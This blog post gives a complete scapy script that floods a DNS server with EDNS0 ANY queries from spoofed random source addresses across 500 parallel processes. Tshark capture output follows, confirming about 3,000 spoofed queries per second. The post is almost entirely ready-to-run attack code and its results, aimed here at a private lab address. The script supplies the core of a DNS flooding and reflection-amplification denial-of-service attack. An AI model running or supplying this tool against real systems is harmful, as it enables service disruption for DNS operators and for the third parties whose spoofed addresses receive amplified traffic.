lost and found ( for me ? )

scapy 2.2.0-dev : send a lot of ANY EDN0 queries with spoofed IP by using scapy and multiprocessing module

Plese note that this script is for scapy 2.2.0-dev

# cat -n send_ANY_EDNS0.py
    1  #!/usr/bin/env python
    2  # -*- coding: utf-8 -*-
    3
    4  ###
    5  # this script is for 2.2.0-dev
    6  # this script can generate crafted EDNS0 foo.bar ANY queries with spoofed IP addresses
    7  # tested with Python 2.7.4
    8  ###
    9
   10  import multiprocessing
   11  import logging
   12  logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
   13
   14  from scapy.all import *
   15  import random
   16  import string
   17  import time
   18
   19  domain_string = string.ascii_lowercase + string.digits
   20  target_server = "192.168.10.12"
   21  interface_name = "br0"
   22  target1 = "foo.bar"
   23
   24  # craft EDNS0 foo.bar ANY with spoofed IP addresses
   25  def craft_DNS():
   26          for j in range(0,100):
   27                  packet3 = (IP(src=RandIP("10.0.0.0/8"), dst="%s" % target_server)/UDP(sport=RandShort(),dport=53)/DNS(rd=1L,id=RandShort(),qd=DNSQR(qname="%s" % target1, qtype="ALL", qclass="IN"), ar=DNSRROPT(rclass=4096)))
   28                  send(packet3,verbose=False,loop=500,iface="%s" % interface_name)
   29                  return
   30
   31  if __name__ == '__main__':
   32          jobs = []
   33          for i in range(500):
   34                  p = multiprocessing.Process(target=craft_DNS)
   35                  jobs.append(p)
   36                  p.start()
   37          p.terminate()

I was able to generate around 3,000 queries/sec with my machine, which depends on machine’s spec.

# tshark -r b.pcap | grep "query 0x" | head -5
Running as user "root" and group "root". This could be dangerous.
 1 0.000000000 10.205.170.50 -> 192.168.10.12 DNS 78 Standard query 0x6d9d  ANY foo.bar
 2 0.000008000 10.43.165.159 -> 192.168.10.12 DNS 78 Standard query 0x9b08  ANY foo.bar
 5 0.000305000 10.127.169.156 -> 192.168.10.12 DNS 78 Standard query 0x82c3  ANY foo.bar
 6 0.000315000 10.217.216.26 -> 192.168.10.12 DNS 78 Standard query 0x2120  ANY foo.bar
 7 0.000320000  10.20.8.214 -> 192.168.10.12 DNS 78 Standard query 0x2cb8  ANY foo.bar

   Questions: 1
   Answer RRs: 0
   Authority RRs: 0
   Additional RRs: 1
   Queries
       foo.bar: type ANY, class IN
           Name: foo.bar
           Type: ANY (Request for all records)
           Class: IN (0x0001)
   Additional records
       <Root>: type OPT
           Name: <Root>
           Type: OPT (EDNS0 option)
           UDP payload size: 4096
           Higher bits in extended RCODE: 0x0
           EDNS0 version: 0
           Z: 0x8000
               Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)
               Bits 1-15: 0x0 (reserved)
           Data length: 0

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.